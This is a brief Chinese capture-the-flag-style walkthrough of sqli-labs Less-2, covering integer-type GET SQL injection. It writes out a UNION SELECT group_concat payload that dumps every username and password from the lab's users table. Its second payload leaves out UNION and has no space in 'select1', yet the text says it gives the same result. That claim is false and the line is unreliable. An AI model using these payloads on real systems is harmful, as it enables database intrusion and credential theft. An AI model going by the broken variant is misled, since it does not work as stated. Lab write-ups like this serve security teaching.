less 2 是GET整型注入
输入id=1’可以发现跟less-1不一样,这里报错了,而输入id=1可以发现未报错,如下图显示
这个原因是因为less-1是字符型的注入,必须作为字符串来处理,而less-2是sql语句对于数字型的数据可以不加单引号。
接着输入id=1 or 1=1,发现可以注入,如下图所示
可以注入,接着用和之前相同的方法先报数据库名,然后是表名,接着是字段,最后的payload如下
id=-1 union select1,group_concat(char(32),username,char(32)),group_concat(char(32),password,char(32)) from users--+
还可以去掉char()
输入:
id=-1 select1,group_concat(username),group_concat(password) from users--+
是一样的结果,能显示security数据库下users表的所有用户名和密码